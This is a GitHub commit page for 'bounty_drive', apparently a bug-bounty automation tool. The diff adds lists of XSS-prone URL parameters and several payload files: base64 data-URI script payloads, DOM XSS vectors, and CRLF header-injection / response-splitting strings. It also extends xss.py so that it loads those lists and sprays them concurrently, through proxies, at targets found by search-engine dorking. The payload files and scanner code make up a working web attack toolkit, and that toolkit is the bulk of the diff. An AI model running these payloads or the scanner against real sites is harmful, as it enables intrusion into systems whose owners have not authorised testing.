Skip to content

Commit

Permalink
fix bugs + improve xss
Browse files Browse the repository at this point in the history
  • Loading branch information
@ElNiak
ElNiak committed Jul 14, 2024
1 parent 8981eb8 commit d06a0c8
Show file tree
Hide file tree
Showing 72 changed files with 838 additions and 381 deletions.
3 changes: 2 additions & 1 deletion README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -173,4 +173,5 @@ Also watch module for more specfic TODOs:
| /_admrus/ /_admrusr/ /publicite/www/delivery/
| /signaler-contenu-illicite.html* /desabo/ /optins/preferences/ /php/ /php/ajax/*
| /feuilletables/ /iframe/ /newsletters/
|_/jeu-nouveau-rustica-bien-etre/ /concours/ /popunder/ /popup/
|_/jeu-nouveau-rustica-bien-etre/ /concours/ /popunder/ /popup/
* https://github.com/dwisiswant0/findom-xss/blob/master/findom-xss.sh
2 changes: 1 addition & 1 deletion bounty_drive/attacks/dorks/google/xss/XSS-Dork.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -104,4 +104,4 @@ intext:"<a href='#' onclick='
intext:"<div onmouseover=
intext:"<img src='x' onerror=
intext:"<input type='text' onblur=
intext:"<select onchange='
intext:"<select onchange='
40 changes: 40 additions & 0 deletions bounty_drive/attacks/dorks/google/xss/xss-parameters.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -23,3 +23,43 @@
?login=
?begindate=
?enddate=
?id=
?url=
?search=
?query=
?cmd=
?z=
?q=
?l=
?r=
?searchstring=
?keyword=­
?file=
?years=
?txt=
?tag=
?max=
?from=
?author=
?pass=
?feedback­=
?mail=
?cat=
?vote=
?sid=
?msg=
?category=
?PID=
?search_keywords=
?mid=
?catid=
?pid=
?order_direction=
?course_id=
?session=
?sfunction=
?search_keywords=
?site=
?errmsg=
?decl_id=
?num=
0 ...acks/xss/payloads/Akamai_XSS_payloads.txt → ...s/payload_to_opti/Akamai_XSS_payloads.txt
View file
File renamed without changes.
0 .../xss/payloads/Cloudflare_xss_payloads.txt → ...yload_to_opti/Cloudflare_xss_payloads.txt
View file
File renamed without changes.
0 .../xss/payloads/Cloudfront_XSS_payloads.txt → ...yload_to_opti/Cloudfront_XSS_payloads.txt
View file
File renamed without changes.
0 ...cks/xss/payloads/Imperva_xss_payloads.txt → .../payload_to_opti/Imperva_xss_payloads.txt
View file
File renamed without changes.
0 ...s/xss/payloads/Incapsula_xss_payloads.txt → ...ayload_to_opti/Incapsula_xss_payloads.txt
View file
File renamed without changes.
0 ...s/xss/payloads/WordFence_xss_payloads.txt → ...ayload_to_opti/WordFence_xss_payloads.txt
View file
File renamed without changes.
0 ...e/attacks/xss/payloads/XSS-BruteLogic.txt → ...ks/xss/payload_to_opti/XSS-BruteLogic.txt
View file
File renamed without changes.
0 ...ayloads/XSS-Bypass-Strings-BruteLogic.txt → ...to_opti/XSS-Bypass-Strings-BruteLogic.txt
View file
File renamed without changes.
0 .../payloads/XSS-Cheat-Sheet-PortSwigger.txt → ...d_to_opti/XSS-Cheat-Sheet-PortSwigger.txt
View file
File renamed without changes.
0 ...attacks/xss/payloads/XSS-EnDe-evation.txt → .../xss/payload_to_opti/XSS-EnDe-evation.txt
View file
File renamed without changes.
0 ...ive/attacks/xss/payloads/XSS-EnDe-h4k.txt → ...acks/xss/payload_to_opti/XSS-EnDe-h4k.txt
View file
File renamed without changes.
0 ...e/attacks/xss/payloads/XSS-EnDe-mario.txt → ...ks/xss/payload_to_opti/XSS-EnDe-mario.txt
View file
File renamed without changes.
0 ...acks/xss/payloads/XSS-EnDe-xssAttacks.txt → ...s/payload_to_opti/XSS-EnDe-xssAttacks.txt
View file
File renamed without changes.
0 ...rive/attacks/xss/payloads/XSS-Fuzzing.txt → ...tacks/xss/payload_to_opti/XSS-Fuzzing.txt
View file
File renamed without changes.
0 ...rive/attacks/xss/payloads/XSS-Jhaddix.txt → ...tacks/xss/payload_to_opti/XSS-Jhaddix.txt
View file
File renamed without changes.
0 ...rive/attacks/xss/payloads/XSS-OFJAAAH.txt → ...tacks/xss/payload_to_opti/XSS-OFJAAAH.txt
View file
File renamed without changes.
0 ...ayloads/XSS-Polyglot-Ultimate-0xsobky.txt → ...to_opti/XSS-Polyglot-Ultimate-0xsobky.txt
View file
File renamed without changes.
0 .../xss/payloads/XSS-Polyglots-Dmiessler.txt → ...yload_to_opti/XSS-Polyglots-Dmiessler.txt
View file
File renamed without changes.
0 ...ve/attacks/xss/payloads/XSS-Polyglots.txt → ...cks/xss/payload_to_opti/XSS-Polyglots.txt
View file
File renamed without changes.
0 ...drive/attacks/xss/payloads/XSS-RSNAKE.txt → ...ttacks/xss/payload_to_opti/XSS-RSNAKE.txt
View file
File renamed without changes.
0 ...drive/attacks/xss/payloads/XSS-Somdev.txt → ...ttacks/xss/payload_to_opti/XSS-Somdev.txt
View file
File renamed without changes.
0 ...ttacks/xss/payloads/XSS-Vectors-Mario.txt → ...xss/payload_to_opti/XSS-Vectors-Mario.txt
View file
File renamed without changes.
0 ...xss/payloads/XSS-With-Context-Jhaddix.txt → ...load_to_opti/XSS-With-Context-Jhaddix.txt
View file
File renamed without changes.
0 ...e/attacks/xss/payloads/XSS-innerht-ml.txt → ...ks/xss/payload_to_opti/XSS-innerht-ml.txt
View file
File renamed without changes.
0 ...e/attacks/xss/payloads/XSS-payloadbox.txt → ...ks/xss/payload_to_opti/XSS-payloadbox.txt
View file
File renamed without changes.
0 ...acks/xss/payloads/angular_xss_payload.txt → ...s/payload_to_opti/angular_xss_payload.txt
View file
File renamed without changes.
0 bounty_drive/attacks/xss/payloads/target.txt → ...ve/attacks/xss/payload_to_opti/target.txt
View file
File renamed without changes.
0 ...tacks/xss/payloads/xss-payload-list-2.txt → ...ss/payload_to_opti/xss-payload-list-2.txt
View file
File renamed without changes.
0 ...attacks/xss/payloads/xss-payload-list.txt → .../xss/payload_to_opti/xss-payload-list.txt
View file
File renamed without changes.
0 ...ve/attacks/xss/payloads/xss-polyglots.txt → ...cks/xss/payload_to_opti/xss-polyglots.txt
View file
File renamed without changes.
0 ...t-parentheses-semi-colons-portswigger.txt → ...t-parentheses-semi-colons-portswigger.txt
View file
File renamed without changes.
16 changes: 16 additions & 0 deletions bounty_drive/attacks/xss/payloads/dcp-xss-payload-list.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
<a href="data:text/html;base64,[B64]%3cscript%3ealert("PAYLOAD");history.back();%3c/script%3e"></a>[B64]
<iframe src="data:text/html;base64,[B64]%3cscript%3ealert("PAYLOAD");history.back();%3c/script%3e"></[B64]
0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]'))
<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"&#09;&#10;&#11;>Y</a
<EMBED SRC="data:image/svg+xml;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<embed src="data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"></embed>
<iframe/src="data:text/html;&Tab;base64&Tab;,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">
"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">
"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">
<object data="data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"></object>
<object data=data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]></object>​
data:image/svg+xml;base64,[B64]<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="Y"><script type="text/ecmascript">alert("PAYLOAD");</script></svg>[B64]
14 changes: 14 additions & 0 deletions bounty_drive/attacks/xss/payloads/dom-xss-payload-list.txt
View file
Original file line number Diff line number Diff line change
@@ -1,3 +1,17 @@
Y#<script>alert('PAYLOAD')</script>
Y#<%<!--'%><script>alert(PAYLOAD);</script -->
Y#<script ^__^>alert(PAYLOAD)</script ^__^
Y#<script src="data:text/javascript,alert(PAYLOAD)"></script>
Y#<script>+-+-1-+-+alert(PAYLOAD)</script>
Y#<script x> alert(PAYLOAD) </script 1=2
Y#<script>a=eval;b=alert;a(b(/ PAYLOAD/.source));</script>'">
Y#<script/y~~~>;alert(PAYLOAD);</script/Y~~~>
Y#%00“><script>alert(PAYLOAD)</script>
Y#%22%3E%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E
Y#%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E
Y#`"><%3Cscript>javascript:alert(PAYLOAD)</script>
Y#%3Cscript>javascript:alert(PAYLOAD)</script>
Y#<SCRIPT>a=/PAYLOAD/alert(a.source)</SCRIPT>
"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
Expand Down
11 changes: 11 additions & 0 deletions bounty_drive/attacks/xss/payloads/http-header-xss-payload-list.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
%0d%0AContent-Length:%200%0d%0A%0d%0AHTTP/1.1%20200%20OK%0d%0AContent-Length:%2016%0d%0A%0d%0A&lt;html&gt;PAYLOAD&lt;/html&gt;
PAYLOAD%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<script>alert("PAYLOAD")</script>
%0D%0ASet-Cookie%3APAYLOAD
%0AContent-Type:html%0A%0A%3Cbody%20onload=alert(%22PAYLOAD%22)%3E
%0AContent-Type:text/html%0A%0A%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3Ehttp://www.test.com
%0AContent-type:%20html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3E
%0AExpect:%20%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3E
%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified: Wed, 13 Jan 2006 12:44:23 GMT%0d%0aContent-Type:text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1
%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCache-Control: no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1
%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aPragma:no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1
%0d%0AContent-Type: text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('PAYLOAD');%2BADw-/script%2BAD4-
68 changes: 54 additions & 14 deletions bounty_drive/attacks/xss/xss.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -59,6 +59,7 @@ def test_xss_target(url, proxy, config, dork_id, link_id, attack_id):
"Accept-Encoding": "gzip,deflate",
"Connection": "close",
"cache-control": "max-age=0",
"Referer": "127.0.0.1",
"DNT": "1",
"Upgrade-Insecure-Requests": "1",
}
Expand Down Expand Up @@ -195,22 +196,44 @@ def launch_xss_attack(config):
scheme = urlparse(website).scheme
host = urlparse(website).netloc
main_url = scheme + "://" + host
print(f"Main URL: {main_url}")
print(f"Forms: {forms}")
print(f"DOM URLS: {domUrls}")
print(f"zip(forms, domUrls): {list(zip(forms, domUrls))}")
for form, domURL in list(zip(forms, domUrls)):
search_tasks_with_proxy.append(
{
"main_url": main_url,
"form": form,
"scheme": scheme,
"host": host,
"domURLs": domURL,
"proxy": proxy,
}
if main_url != "://":
cprint(
f"Main URL: {main_url}",
color="yellow",
file=sys.stderr,
)
cprint(
f"Forms: {forms}",
color="yellow",
file=sys.stderr,
)
cprint(
f"DOM URLS: {domUrls}",
color="yellow",
file=sys.stderr,
)
cprint(
f"zip(forms, domUrls): {list(zip(forms, domUrls))}",
color="yellow",
file=sys.stderr,
)
for form, domURL in list(zip(forms, domUrls)):
search_tasks_with_proxy.append(
{
"main_url": main_url,
"form": form,
"scheme": scheme,
"host": host,
"domURLs": domURL,
"proxy": proxy,
}
)

search_tasks_with_proxy = [
i
for n, i in enumerate(search_tasks_with_proxy)
if i not in search_tasks_with_proxy[n + 1 :]
]
cprint(
f"Total XSS Targets: {len(search_tasks_with_proxy)}",
color="yellow",
Expand All @@ -224,6 +247,20 @@ def launch_xss_attack(config):
with open("attacks/xss/payloads/blind-xss-payload-list.txt", "r") as f:
blindPayloads = f.readlines()

domPayloads = []
with open("attacks/xss/payloads/dom-xss-payload-list.txt", "r") as f:
domPayloads = f.readlines()

dcpPayloads = []
with open("attacks/xss/payloads/dcp-xss-payload-list.txt", "r") as f:
dcpPayloads = f.readlines()

httpPayloads = []
with open(
"attacks/xss/payloads/http-header-xss-payload-list.txt", "r"
) as f:
httpPayloads = f.readlines()

encoding = base64_encoder if config["encode_xss"] else False
with concurrent.futures.ThreadPoolExecutor(
max_workers=number_of_worker
Expand All @@ -236,6 +273,9 @@ def launch_xss_attack(config):
task["main_url"],
task["form"],
blindPayloads,
dcpPayloads,
httpPayloads,
domPayloads,
encoding,
config,
task["proxy"],
Expand Down
Empty file added bounty_drive/attacks/xss/xss_constants.py
View file
Empty file.
Empty file added bounty_drive/attacks/xss/xss_dom.py
View file
Empty file.
Loading

0 comments on commit d06a0c8

Please sign in to comment.